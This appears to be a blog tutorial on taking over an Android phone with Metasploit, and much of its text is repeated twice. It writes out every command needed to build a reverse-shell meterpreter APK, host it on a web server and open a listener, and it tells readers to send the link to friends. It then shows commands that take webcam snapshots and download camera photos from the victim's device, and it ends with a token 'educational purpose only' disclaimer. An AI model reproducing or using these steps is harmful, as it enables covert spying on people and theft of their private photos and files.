Metasploit has released android meterpreter too for exploitation so in this tutorial i will show you that how to use an android meterpreter payload to hack into an android device.
REQUIREMENTS:
1. Metasploit Framework (I am using Kali Linux 1.1.0 ) .
2.Any Android smartphone.
Attacker IP address: 192.168.0.103 (by typing "ifconfig" on kali linux terminal).
Attacker Port no to receive connection:8080 (you can use port 443 or something else).
START:
Step 1: Open terminal and type "ifconfig". to get the Attacker IP address.
Step 2: Open second terminal by clicking (Ctrl+Shift+t). Android phones only supports .apk files. So we have to make an .apk file. After that we have to upload that to that Apache server. Redirect the .apk file to the /var/www/ specific directory.
Now type following commands
"msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=8080 R > /var/www/lolipop.apk"
Step 3: Open third terminal by clicking (Ctrl+Shift+t). I am going to dump this .apk file to the Apache2 server. So we have to start the apache2 server by typing
"apache2 start"
"service apache2 start"
Step 4: Open Forth terminal by clicking (Ctrl+Shift+t). we going to exploit the device. So
start Metasploit Framework.
"msfconsole" (wait a few minute.it takes sometime to get start)
"use multi/handler"
"set payload android/meterpreter/reverse_tcp"
"set lhost 192.168.0.103"
"set lport 8080"
"exploit"
Send the link to your friends. (like <your ip address>/<.apk file name>).. Mine is "192.168.0.103/lolipop.apk"
after they installed the .apk file the exploitation starts.
Now Type the following commands to know what we can do with this.
"help" (it shows all the possible things we do with the metasploit)
you can see all the Android commands over here.
we can get access the smartphone remotely .
get access camera by
"webcam_list"
"webcam_snap 1"
It snaps the pic and send to the attacker.
Now steal the data from the Device.
get enter to the sdcard.
"cd /sdcard/"
"ls"
You can see all the Folders which are presented in the Android device.
i am going to steal the camera picture.
"cd /sdcard/DCIM"
"ls"
"cd /sdcard/DCIM/Camera"
"ls"
Now Steal the data. Type
"download <file name which we want to sownload>"
Thats it guys..
enjoy it.
This is only for Educational Purpose only. I am not responsible for any of the illegal activities..
REQUIREMENTS:
1. Metasploit Framework (I am using Kali Linux 1.1.0 ) .
2.Any Android smartphone.
Attacker IP address: 192.168.0.103 (by typing "ifconfig" on kali linux terminal).
Attacker Port no to receive connection:8080 (you can use port 443 or something else).
START:
Step 1: Open terminal and type "ifconfig". to get the Attacker IP address.
Now type following commands
"msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=8080 R > /var/www/lolipop.apk"
Step 3: Open third terminal by clicking (Ctrl+Shift+t). I am going to dump this .apk file to the Apache2 server. So we have to start the apache2 server by typing
"apache2 start"
"service apache2 start"
Step 4: Open Forth terminal by clicking (Ctrl+Shift+t). we going to exploit the device. So
start Metasploit Framework.
"msfconsole" (wait a few minute.it takes sometime to get start)
"use multi/handler"
"set payload android/meterpreter/reverse_tcp"
"set lhost 192.168.0.103"
"set lport 8080"
"exploit"
after they installed the .apk file the exploitation starts.
"help" (it shows all the possible things we do with the metasploit)
you can see all the Android commands over here.
we can get access the smartphone remotely .
get access camera by
"webcam_list"
"webcam_snap 1"
It snaps the pic and send to the attacker.
Now steal the data from the Device.
get enter to the sdcard.
"cd /sdcard/"
"ls"
i am going to steal the camera picture.
"cd /sdcard/DCIM"
"ls"
"cd /sdcard/DCIM/Camera"
"ls"
Now Steal the data. Type
"download <file name which we want to sownload>"
Thats it guys..
enjoy it.
This is only for Educational Purpose only. I am not responsible for any of the illegal activities..
No comments:
Post a Comment